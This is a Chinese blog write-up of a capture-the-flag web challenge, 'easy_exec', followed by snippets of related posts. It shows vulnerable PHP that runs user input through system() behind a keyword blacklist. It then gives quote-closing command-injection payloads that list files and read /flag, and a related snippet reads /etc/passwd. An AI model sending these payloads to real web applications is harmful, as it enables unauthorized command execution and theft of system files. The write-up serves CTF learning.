BMZCTF WEB easy_exec

最新推荐文章于 2022-09-25 13:19:14 发布
最新推荐文章于 2022-09-25 13:19:14 发布
阅读量659 收藏
点赞数
分类专栏: BMZCTF-WEB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Crazy198410/article/details/113129858
版权

在这里插入图片描述
打开页面:
在这里插入图片描述
显示:no file
查看源码:
在这里插入图片描述
发现新的页面de.php,打开:
在这里插入图片描述
可以看到源码
要我们输入两个参数,最后与file拼接,再执行。
知道原理后,开始分析代码:

<?php

highlight_file(__FILE__);

$comm1 = $_GET['comm1'];     #输入第一个参数
$comm2 = $_GET['comm2'];     #输入第二个参数


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))        #对第一个参数进行过滤
    $file1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))        #对第二个参数进行过滤
    $file2 = "";

$flag = "#flag in fllllag";

$comm1 = '"' . $comm1 . '"';   #用"把第一个参数包围起来
$comm2 = '"' . $comm2 . '"';   #用"把第二个参数包围起来

$cmd = "file $comm1 $comm2";   # 拼接 file命令
system($cmd);                  # 执行命令
?>

第一次尝试:
当我们输入:

?comm1=de.php&comm2=de.php

返回了

de.php: PHP script, ASCII text de.php: PHP script, ASCII text

第二次尝试:
当我们输入:

?comm1=ls&comm2=/flag

返回了:

ls: cannot open `ls' (No such file or directory) /flag: ASCII text

我们现在要绕过$cmd = "file $comm1 $comm2";,执行我们想要执行的命令。

我们看到$comm1 = '"' . $comm1 . '"';,这句是用"将我们的输入进行了包围,那么,我们就可以且"进行闭合。

第三次尝试:
我们输入:

?comm1="|ls;"&comm2=de.php

返回了:

de.php index.html

说明我们的ls命令被执行了。

所以最终payload如下:

?comm1="|cat%20/flag;"&comm2=de.php

得到了flag:

BMZCTF{f989dea98e2046c09e3048f3ddb24ea7}

Crazy198410
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
BMZCTF-WEB-easy_exec
qq_24033605的博客
05-24 259
easy_exec 主页显示nofile。 尝试使用dirsearch扫描一下。 扫描发现两个文件。 查看de.php。 显示着一段php代码。 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|m
BMZCTFeasy_exec
末初的CSDN博客
02-07 548
http://bmzclub.cn/challenges#easy_exec 查看源码也没发现什么,尝试目录扫描 发现有个index.html,访问查看源码,发现de.php 这题我看搞不懂搞两个正则匹配在这干啥,又没有起到过滤作用,直接双引号闭合,然后执行命令 ?comm1=/flag";cat /flag;"&comm2=/etc/passwd ...
[BMZCTF]-easy_exec
cjdgg的博客
05-23 209
[BMZCTF]-easy_exec 题目直接给出源代码,看这样子,应该又是绕过过滤然后命令执行 这道题先搜一搜file命令的作用,并查看相关参数的作用后,确定file没用后,确定了这题考点应该是要插入我们想要执行的命令 这里看了一下,把反引号和单引号都过滤了,但是却没过滤双引号,偏偏双引号还是这题用来框住命令的 直接构造";cat%20/flag",这两个双引号分别用来闭合题目中的双引号。 成功拿到flag ...
php exec ctf,[CTF_web]exec/exec1.php
weixin_35524300的博客
03-17 599
CTF_web源码如下 :// Get input$target = $_REQUEST[ 'ip' ];// var_dump($target);$target=trim($target);// var_dump($target);// Set blacklist$substitutions = array('&' => '',';' => '','|' => '',...
BMZCTF:shell_exec
末初的CSDN博客
01-24 770
http://bmzclub.cn/challenges#shell_exec 命令执行绕过 ping -c 2 "$_POST[ip]" 2>&1 2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件即以下这种形式 ping -c 2 "command>1.txt" 2>&1 fuzz一下发现同时还过滤了很多关键字符,但是发现没有过滤反引号,即可构造 `ls>1.txt`
web_easy_源码.zip
10-18
【标题】"web_easy_源码.zip"是一个与Web开发相关的源码压缩包,很可能包含一个简化版或教学性质的Web应用项目。这个名字暗示了它可能是为了初学者或者快速搭建Web服务而设计的,让我们来深入探讨这个项目可能涉及的...
Fujitsu.zip_easy _fujitsu
09-23
《Fujitsu_Easy_Kit试用手记_从入门到精通》 富士通(Fujitsu)是一家全球知名的IT企业,其产品线广泛,涵盖了硬件、软件和服务等多个领域。Fujitsu_Easy_Kit是富士通推出的一款便捷式解决方案,旨在简化用户的IT操作...
easy_c.zip_easy
09-22
【标题】"easy_c.zip_easy" 是一个专为C语言初学者设计的压缩包,它包含了一系列简单的小型程序,旨在帮助初学者更好地理解和实践C编程基础。这些小程序的目的是让学习过程更加直观和易懂,使初学者能够通过实际操作...
BMZCTF WEB shell_exec
Crazy198410的博客
01-25 398
打开页面发现是个ping的页面: 尝试了几个命令执行的方法,均无返回结果: 查看源代码: 发现了下面的命令: ping -c 2 "$_POST[ip]" 2>&1 后面的2>&1的意思是:标准错误重定向到标准输出。 也就是说我们在网页的输入,当遇错时,结果会被输出到一个地方,而我们没有指定,所以看不到。 知道原理了,那么我们开始构造payload: 1、要程序运行错误; 2、要指定输出位置。 由于页面带过滤,经过多次尝试:发现 #以下被过滤 cat tac less m.
[原题复现]百度杯CTF比赛 十月场 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
buuctf web题[ACTF2020 新生赛]Exec
qq_44740774的博客
09-25 248
buuctf web的[ACTF2020 新生赛]Exec
[ACTF2020 新生赛] web题-Exec
BROTHERYY的博客
07-08 471
//复现环境:buuoj.cn ping就完事 直接看看根目录有没有什么惊喜 cat /flag
BUUCTF Web [ACTF2020 新生赛]Exec
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生赛]Exec一、题目简介二、思路分析三、解题步骤1)遍历目录2)查看文件内容四、总结 一、题目简介 进入题目连接后,是一个ping的「功能」,我们输入ip地址或域名后可以使用ping命令「测试」网络的连通性 二、思路分析   &nbs.
BUUCTF WEB exec+lovesql
qq_41696858的博客
08-18 204
攻防世界靶场不知道咋了,又进不去了 那就刷几题BUUCTF吧 exec 这题题目名字给的挺明显的,命令执行 经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了 127.0.0.1|ls ../../../ 127.0.0.1|cat ../../../flag LoveSql SQL注入,注入点和之前一样的,一个单引号直接回显 那么后面就是payload了 admin 123' order by 4 # 开始报不同的错,可知列数为3 admin 123' union select 1,2,3
end 21-4-19
qq_45781155的博客
04-19 163
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla
ctfshow—SSRF详解
cosmoslin的博客
09-24 1304
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
Buuctf之web(五)
qq_50589021的博客
12-14 6596
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
easy_install 安装
最新发布
09-22
easy_install 是 Python 的一个扩展包管理工具,用于方便地安装和管理第三方扩展包。它是 Python 中的一种标准安装工具,使得安装扩展包变得简单易用。 要使用 easy_install 安装扩展包,首先需要确保已经正确安装...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值